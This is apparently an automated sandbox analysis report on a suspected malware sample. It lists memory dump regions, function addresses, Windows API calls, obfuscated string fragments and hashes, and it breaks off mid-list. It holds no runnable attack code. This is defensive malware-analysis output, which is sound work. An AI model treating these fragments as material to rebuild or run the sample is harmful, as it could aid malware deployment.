                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 21a903e7ed92cb0111416a1d9b215506c725e5d81d9519e9769a4786d73d928a
                                                      • Instruction ID: 1c18758665e7774a70359849fa579a6b64387cb90112c6613993851466b1db77
                                                      • Opcode Fuzzy Hash: 21a903e7ed92cb0111416a1d9b215506c725e5d81d9519e9769a4786d73d928a
                                                      • Instruction Fuzzy Hash: AB419D34608780ABD724EA16D890F2FF7E6EF85754F64882CF58A97251D331E841CB62
                                                      Function 001E63B8 Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3df5885d098140595090092ecf7d39077de41d59b32992961db0e704efe14842
                                                      • Instruction ID: 9ff53db688eb374387f77073cb16ee5024d9efeba99cce431a6ea289dc7377e8
                                                      • Opcode Fuzzy Hash: 3df5885d098140595090092ecf7d39077de41d59b32992961db0e704efe14842
                                                      • Instruction Fuzzy Hash: 5B31C370649741BAD724DA06CD81F3EB7A6FBA0B95FA44508F281562D1D370A851CB52
                                                      Function 001B0EEC Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f6333baad86836ee1f99305ffa7ba18fcafdfb7c37563844351cfebd2715d84
                                                      • Instruction ID: e8c06ea93f74695fe0f52b24ed97e0c649ac929070d4f2ea167ff57823f6c7d3
                                                      • Opcode Fuzzy Hash: 4f6333baad86836ee1f99305ffa7ba18fcafdfb7c37563844351cfebd2715d84
                                                      • Instruction Fuzzy Hash: D8210CB4A0025A9FEB15CFA4CC90BBFBBB1FB4A304F144859E911BB291C735A951CB64
                                                      Function 004533B6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 113memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 33 4533b6-453579 38 453584-45359a 33->38 39 45357b-453582 33->39 40 45359b-4535d6 VirtualAlloc 38->40 39->38 39->40 43 4535e7-453601 40->43 44 4535dc 40->44 45 453615-45361c 43->45 46 453607-453613 43->46 44->43 47 453631-453632 45->47 48 453622-45362c 45->48 46->45 50 453639-453671 VirtualFree 47->50 48->50 52 453673-45367a 50->52 53 45367c-453692 50->53 52->53 54 453693-4536b4 52->54 53->54 56 4536c1-4536fc call 453701 54->56 57 4536ba-4536bf 54->57 57->56
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004535D2
                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00453666
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: Virtual$AllocFree
                                                      • String ID: V$u
                                                      • API String ID: 2087232378-1190653701
                                                      • Opcode ID: 9b8efcc090f56331151d56b6e029e1e6323d6219eac5ea9b46b5b557dd839eb4
                                                      • Instruction ID: 1f884908c5dded6585c961792f304b8cb26871ffe2620fb5fe9ca3297ff5a156
                                                      • Opcode Fuzzy Hash: 9b8efcc090f56331151d56b6e029e1e6323d6219eac5ea9b46b5b557dd839eb4
                                                      • Instruction Fuzzy Hash: E5415EB160424DEFDB119F28CC84B9F37A4EB08356F144429AD05C7B52E67A9E28CA5D
                                                      Function 001E3220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 229 1e3220-1e322f 230 1e32ac-1e32b0 229->230 231 1e3236-1e3252 229->231 232 1e32a2-1e32a6 RtlFreeHeap 229->232 233 1e32a0 229->233 234 1e3286-1e3296 231->234 235 1e3254 231->235 232->230 233->232 234->233 236 1e3260-1e3284 call 1e5af0 235->236 236->234
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 001E32A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 48185da7b7cd2b6623257367cb7ae4f039d21b5c037d66ec7fc7ed6593114ce7
                                                      • Instruction ID: 2bde13952b257ab8e1ab71e4d9c48cd7d4838c69414d2b8a705048f8966d323d
                                                      • Opcode Fuzzy Hash: 48185da7b7cd2b6623257367cb7ae4f039d21b5c037d66ec7fc7ed6593114ce7
                                                      • Instruction Fuzzy Hash: 59016D3450D280DBC701EF18E859A2EBBE9EF9A700F05491CE5C58B361D335DD60DBA2
                                                      Function 001E3202 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 240 1e3202-1e3211 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 001E3208
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 916531ed38cdb561bd9b55a80f1b05c871fd0772d8642d4562cf25126c7ffd9a
                                                      • Instruction ID: d0ed117c9cdcd576032874a79efbe200c2f8d1a5c8300d1848d0c118add1a37d
                                                      • Opcode Fuzzy Hash: 916531ed38cdb561bd9b55a80f1b05c871fd0772d8642d4562cf25126c7ffd9a
                                                      • Instruction Fuzzy Hash: ACB012300400005FDA042B00FC0BF203511EB00609F800150A100080B1D56258A4C554

                                                      Non-executed Functions

                                                      Function 001BDB6F Relevance: 32.0, Strings: 24, Instructions: 2006COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
                                                      • API String ID: 2994545307-1418943773
                                                      • Opcode ID: b325f56e45d10f04a77a0ff55611d35df03475a0fabf6ffaf054c5bf5ea8b615
                                                      • Instruction ID: 51c11b8ae7cc01fb61c6bd8b335e54d05e33f62154e37680abe75607a03a371f
                                                      • Opcode Fuzzy Hash: b325f56e45d10f04a77a0ff55611d35df03475a0fabf6ffaf054c5bf5ea8b615
                                                      • Instruction Fuzzy Hash: 60F276B45083819BD774CF14C894BEBBBE6BFD5304F54482CE4C98B292EB719985CB92
                                                      Function 001D23E0 Relevance: 31.3, APIs: 4, Strings: 12, Instructions: 3298COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C
                                                      • API String ID: 0-786070067
                                                      • Opcode ID: 300732aab26cedb846d39cf734de4e61c643b55ff9282823a112c4dd74985374
                                                      • Instruction ID: 12b3c8ea428a4cdee2f00d720fd6d126a0618e57bff7f73a2896b25ea220f0bc
                                                      • Opcode Fuzzy Hash: 300732aab26cedb846d39cf734de4e61c643b55ff9282823a112c4dd74985374
                                                      • Instruction Fuzzy Hash: A933AE74504B818FD7258F38C590762BBF1BF16304F58899ED4EA8BB92C735E906CBA1
                                                      Function 001C9F62 Relevance: 21.7, Strings: 17, Instructions: 473COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
                                                      • API String ID: 0-1131134755
                                                      • Opcode ID: e4ab8eecef8a24c7d9d2205e3990623cb6511e02ba2176fd89307b57cda255a4
                                                      • Instruction ID: e85f609f78a23fc9d8b9f651a3b5f1dc89d7a4fdf23492bc38c1ec78c1558c0e
                                                      • Opcode Fuzzy Hash: e4ab8eecef8a24c7d9d2205e3990623cb6511e02ba2176fd89307b57cda255a4
                                                      • Instruction Fuzzy Hash: E552C6B800D385CAE271CF26D581B9EBAF1BB92744F608A1DE1ED9B255DB708045CF93
                                                      Function 001C9510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                      • API String ID: 0-655414846
                                                      • Opcode ID: f34801dfc1016975ec802783afbf89be513918ee18117833db1cb169d2f1122e
                                                      • Instruction ID: 3bbde187edb93891061894852b54065c3a79e1c234b608b0d1834d4ab3a4220b
                                                      • Opcode Fuzzy Hash: f34801dfc1016975ec802783afbf89be513918ee18117833db1cb169d2f1122e
                                                      • Instruction Fuzzy Hash: FEF14FB4508380ABD310DF55D885A2BBBF4FBAAB48F144D1CF4D99B252D334DA48CB96
                                                      Function 001CDD29 Relevance: 14.9, Strings: 11, Instructions: 1142COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+($)IgK$,Q?S$-M2O$<Y.[$=]+_$Y9N;$hX]N$n\+H$upH}${E
                                                      • API String ID: 0-1557708024
                                                      • Opcode ID: b276f70999975352212973cd7d78ba678e9e6949b6ed66f8cb6790dbc900163d
                                                      • Instruction ID: 9ffd90e884f6b2df1f6395c822880f9d061bdca8e9c66c59cb77b7bad4132108
                                                      • Opcode Fuzzy Hash: b276f70999975352212973cd7d78ba678e9e6949b6ed66f8cb6790dbc900163d
                                                      • Instruction Fuzzy Hash: D992DE75E00205CFDB08CF68D851BAEBBB2BF59310F298269E456AB391D735ED41CB90
                                                      Function 0036548E Relevance: 11.6, Strings: 8, Instructions: 1606COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "{~$*$HHg$S~9w$V|N$mBPp$|?_$BZ
                                                      • API String ID: 0-2737090800
                                                      • Opcode ID: 313aae0a03f12e7c693f1b63b1de43e3161f8a598d2567105c628838cba8e1bd
                                                      • Instruction ID: da72123c2790b8cfb4a95c9dbe03452679009fd8f5647fb3f3cd7f8f2e9074a2
                                                      • Opcode Fuzzy Hash: 313aae0a03f12e7c693f1b63b1de43e3161f8a598d2567105c628838cba8e1bd
                                                      • Instruction Fuzzy Hash: 1AB2F5F360C604AFE304AE2DEC8567AF7E9EF94720F1A853DE6C4C3744EA3558418696
                                                      Function 001C098B Relevance: 10.8, Strings: 8, Instructions: 836COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+($&> &$,#15$9.5^$cah`$gce/$qrqp${
                                                      • API String ID: 0-4102007303
                                                      • Opcode ID: 4a9dece07fb5fc4aaf3c3bc88fd71a6831c65fe57cbba03a6ce0ba90c3bbd1c6
                                                      • Instruction ID: 3b4aeedb1f50da45031ef8b40f07b99ca743a13aea0ce408dfa3b9f9efb51c57
                                                      • Opcode Fuzzy Hash: 4a9dece07fb5fc4aaf3c3bc88fd71a6831c65fe57cbba03a6ce0ba90c3bbd1c6
                                                      • Instruction Fuzzy Hash: 4C6289B5608381CBD730CF14D891BABB7E1FFAA314F08492DE49A8B652E7759940CB53
                                                      Function 001A1000 Relevance: 10.5, Strings: 7, Instructions: 1785COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
